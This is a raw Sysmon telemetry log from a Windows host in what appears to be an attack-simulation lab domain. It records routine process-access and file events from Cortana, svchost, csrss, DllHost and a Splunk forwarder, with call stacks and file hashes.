12:06:01.627{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\MSIMGSIZ.DAT2021-03-31 12:06:01.627 10341000x80000000000000009832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.472{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.472{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x80000000000000009830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.452{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=9C14D61CF943F5572B1E8EB1F812A532,SHA256=8D482A08CD7E25E299EBA09C7D766671F22E8239C0B2F1ED6C5C7F8184DC4E26,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.440{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.440{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.424{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4D01-00000000AE01}2956C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.424{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4D01-00000000AE01}2956C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4D01-00000000AE01}2956C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.408{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-65A9-6064-4D01-00000000AE01}2956C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.408{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-65A9-6064-4D01-00000000AE01}2956C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4D01-00000000AE01}2956C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.361{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4C01-00000000AE01}3980C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000009820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.361{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4C01-00000000AE01}3980C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4C01-00000000AE01}3980C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.346{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet 
Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=9C14D61CF943F5572B1E8EB1F812A532,SHA256=8D482A08CD7E25E299EBA09C7D766671F22E8239C0B2F1ED6C5C7F8184DC4E26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.346{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=C1DDEA3EF6BBEF3E7060A1A9AD89E4C5,SHA256=B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.346{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-65A9-6064-4C01-00000000AE01}3980C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.346{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.346{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000009813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.346{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65A9-6064-4C01-00000000AE01}3980C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4C01-00000000AE01}3980C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.143{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=C1DDEA3EF6BBEF3E7060A1A9AD89E4C5,SHA256=B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.143{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet 
Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000009809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.143{266CAFBE-64C4-6064-9E00-00000000AE01}3120C:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\container.dat2021-03-31 12:06:01.143 10341000x80000000000000009808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.127{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+ab790|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000009807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.127{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+ab271|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.065{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12273002EB31286C76C59414F78D5FA3,SHA256=527A2D07C6B1187CA1AF20989D51DF25E4CE395437B3B800EBA79E72559CB06A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:02.408{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E336BFCEC3CC823873739889FC9E99F9,SHA256=E65097371948D7A365F01428E4029CC7AC900ACC1F4C7CD906A24D9CF06617A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.985{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:03.985{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 